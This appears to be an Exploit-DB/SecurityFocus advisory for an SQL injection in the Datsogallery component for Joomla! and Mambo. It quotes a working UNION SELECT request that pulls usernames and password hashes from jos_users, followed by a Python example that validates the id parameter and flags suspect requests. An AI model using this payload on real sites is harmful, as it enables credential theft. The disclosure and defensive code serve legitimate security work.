vendor: Datsogallery
by: SecurityFocus
CVSS: 8.8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Datsogallery
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Joomla! and Mambo
2008

SQL Injection in Datsogallery Component for Joomla! and Mambo

The Datsogallery component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application.

Mitigation:

Ensure that user-supplied data is properly sanitized before being used in an SQL query.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/28361/info

The Datsogallery component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/index.php?option=com_datsogallery&func=detail&id='union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8,9,0,1,2,3,4,5+from+jos_users/*
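
The mitigation above, applied to the `id` parameter, as an added example that is not part of the original entry or the component's own code: accept only a decimal integer, pass it as a bound parameter, and use the same check to flag suspect requests. It is written in Python rather than the component's PHP, and the `pictures` table and all function names are hypothetical stand-ins.

```python
import re
import sqlite3
from urllib.parse import urlsplit, parse_qs

ID_RE = re.compile(r"[0-9]{1,10}")  # a picture id is a plain decimal integer

def parse_id(raw):
    """Return the id as int, or None if it is anything but decimal digits."""
    return int(raw) if raw is not None and ID_RE.fullmatch(raw) else None

def classify(url):
    """'ignored' for other components, 'ok' for a numeric id, 'reject' otherwise."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if qs.get("option") != ["com_datsogallery"] or qs.get("func") != ["detail"]:
        return "ignored"
    ids = qs.get("id", [])
    return "ok" if len(ids) == 1 and parse_id(ids[0]) is not None else "reject"

def fetch_title(db, url):
    """Hardened lookup: validate first, then pass the value as a bound parameter."""
    if classify(url) != "ok":
        return None
    pic_id = parse_id(parse_qs(urlsplit(url).query)["id"][0])
    row = db.execute("SELECT title FROM pictures WHERE id = ?", (pic_id,)).fetchone()
    return row[0] if row else None

def demo_db():
    # Constructed stand-in schema; the component's real tables are not shown in this entry.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pictures (id INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO pictures VALUES (42, 'harbour')")
    return db

BASE = "http://www.example.com/index.php?option=com_datsogallery&func=detail&id="
SAMPLES = [  # constructed requests; the second is the request quoted in this entry
    BASE + "42",
    BASE + "'union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8,9,0,1,2,3,4,5+from+jos_users/*",
    BASE + "42%27",
    "http://www.example.com/index.php?option=com_content&id=7",
]

if __name__ == "__main__":
    db = demo_db()
    for url in SAMPLES:
        print(classify(url), fetch_title(db, url), url[:80])
```

Running `classify` over the request paths in a web server access log gives a quick list of `com_datsogallery` detail requests whose `id` was not a plain integer.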